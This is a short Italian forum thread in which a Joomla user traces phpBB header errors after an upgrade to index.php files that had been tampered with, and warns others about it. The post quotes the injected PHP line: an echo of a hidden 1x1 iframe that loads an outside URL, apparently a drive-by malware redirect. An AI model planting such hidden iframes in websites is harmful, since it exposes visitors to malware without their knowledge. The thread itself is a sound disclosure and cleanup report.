Joomla.it Forum

Componenti per Joomla! => Gestione Forum => : Greenhouse 04 Jun 2009, 08:47:02

: [phpBB Debug] PHP Notice: dopo aggiornamento joomla
: Greenhouse 04 Jun 2009, 08:47:02
Ciao a tutti,

dopo aver effettuato l'aggiornamento di joomla dalla 1.5.10 alla 1.5.11, il mio forum phpbb mi segnala i seguenti errori:

:
[phpBB Debug] PHP Notice: in file /includes/session.php on line 990: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 990: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/session.php on line 990: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3760: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3762: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3763: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)
[phpBB Debug] PHP Notice: in file /includes/functions.php on line 3764: Cannot modify header information - headers already sent by (output started at /includes/hooks/index.php:251)

Da quanto ho letto, il problema è dovuto all'index.php della root (ovvero joomla).
Mi rivolgo qui e non su phpbb perchè la causa dell'errore è evidentemente l'aggiornamento di joomla.

Grazie in anticipo.
: Re:[phpBB Debug] PHP Notice: dopo aggiornamento joomla
: Greenhouse 04 Jun 2009, 14:04:49
ATTENZIONE: in seguito ad aggioramento di joomla dalla 1.5.10 alla 1.5.11, è successo che sono stati modificati i file di PHPBB3 index.php della root e quello sotto include/hooks (ho phpbb3 in una sottodirectory).
Mi è stato comunicato, infatti, che alcuni antivirus, entrando nella pagina, segnalavano la presenza di un trojan.
E' stata infatti aggiunta alla fine la stringa:

:
    echo "<iframe src=\"http://quoasty.com/?click=71E847\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
che invito a NON cliccare.

Ho risolto prendendo, dal mio backup settimanale, i vecchi index.php e sostituendo quelli danneggiati (anche se sarebbe stato sufficiente rimuovere la stringa.

Non riesco a capire come sia potuto succedere, è possibile che fra i files che ho scaricato da joomla.it ci sia qualcosa di sospetto?

Per favore, verificate.